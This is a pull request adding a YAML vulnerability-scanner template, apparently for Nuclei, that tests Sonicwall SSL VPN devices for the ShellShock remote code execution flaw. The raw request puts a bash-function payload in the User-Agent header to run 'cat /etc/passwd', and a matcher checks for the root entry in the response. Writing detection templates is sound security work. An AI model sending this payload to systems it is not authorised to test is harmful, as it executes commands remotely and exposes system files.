Merge pull request #772 from PR3R00T/patch-10

New Sonicwall 0day Exploit test

vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml

@@ -0,0 +1,29 @@
+id: sonicwall-sslvpn-shellshock
+
+info:
+  name: Sonicwall SSLVPN ShellShock RCE
+  author: PR3R00T
+  severity: critical
+  reference: |
+      - https://twitter.com/chybeta/status/1353974652540882944
+      - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/jarrewrite.sh HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
+        Accept: */*
+        Accept-Language: en
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+      - type: status
+        status:
+          - 200